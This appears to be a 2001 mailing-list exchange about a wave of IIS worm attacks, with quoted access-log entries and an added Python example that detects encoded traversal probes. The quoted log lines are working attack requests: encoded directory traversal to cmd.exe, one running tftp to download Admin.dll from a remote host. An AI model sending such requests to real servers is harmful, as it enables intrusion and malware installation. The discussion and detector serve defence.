This is the same thing I emailed about earlier,
except the attacks I am getting are coming from 216.x.x.x
(also same as me).
I think this is more deliberate, since it cannot
be filtered from your routers since you risk
cutting yourself off the internet.
Like you, I'm getting more than one every second.
Like you, none yesterday.
>
> Hmm. I've gotten 10,000 of them *today*. Yesterday, none.
>
> They're almost all from 66.12.* addresses (Verizon DSL in California, same
> as me). This is where most of my Code Red attacks are (still) coming
> from, probably because there's a lot of people running IIS who aren't
> really even aware of it.
>
> I'm getting 10-20 hits a second of these attacks...
>
> Is this just a resurgence of that old hack, or something new?
>
> Here's a random sampling from the log file:
> 66.12.144.187 - - [18/Sep/2001:09:19:50 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 158 "" ""
> 66.12.193.108 - - [18/Sep/2001:09:19:51 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
> 66.12.144.187 - - [18/Sep/2001:09:19:51 -0700] "GET
--
Freddie Mendoza
[EMAIL PROTECTED]
Search Engine for Cheap Books
http://satori.com/cheapbooks
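
Added example, not part of either message: one way to pick requests like the two quoted log entries out of an access log and tally them per source address. It goes beyond the quoted sample by folding every two-byte overlong UTF-8 form rather than only `%c0%af`; the sample lines, the addresses, and the names `classify` and `summarize` are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample in the log format quoted above (documentation addresses,
# not real hosts). The last entry is deliberately cut off mid-request.
SAMPLE_LOG = r'''192.0.2.10 - - [18/Sep/2001:09:19:50 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 158 "" ""
198.51.100.7 - - [18/Sep/2001:09:19:51 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 158 "" ""
203.0.113.5 - - [18/Sep/2001:09:19:52 -0700] "GET /index.html HTTP/1.0" 200 1024 "" ""
192.0.2.10 - - [18/Sep/2001:09:19:53 -0700] "GET
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3} ')
# Two-byte overlong UTF-8: lead byte C0/C1 plus a continuation byte encodes an
# ASCII character (C0 AF is '/'), which a strict decoder must reject.
OVERLONG_RE = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

def _fold(m):
    lead, cont = m.group()
    return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])

def classify(uri):
    """Return the reasons a request URI looks like an encoded traversal probe."""
    reasons = set()
    once = unquote_to_bytes(uri.split("?", 1)[0])
    twice = unquote_to_bytes(once)
    if twice != once:
        reasons.add("double-encoding")      # e.g. %252f -> %2f -> /
    folded = OVERLONG_RE.sub(_fold, twice)
    if folded != twice:
        reasons.add("overlong-utf8")        # e.g. %c0%af -> /
    if b"/../" in folded.replace(b"\\", b"/"):
        reasons.add("traversal")
    if b"cmd.exe" in folded.lower():
        reasons.add("shell-binary")
    return reasons

def summarize(log_text):
    """Tally flagged requests per source address and per reason."""
    by_source, by_reason = Counter(), Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                        # truncated entries are skipped, not guessed at
        reasons = classify(m.group(2))
        if reasons:
            by_source[m.group(1)] += 1
            by_reason.update(reasons)
    return by_source, by_reason
```
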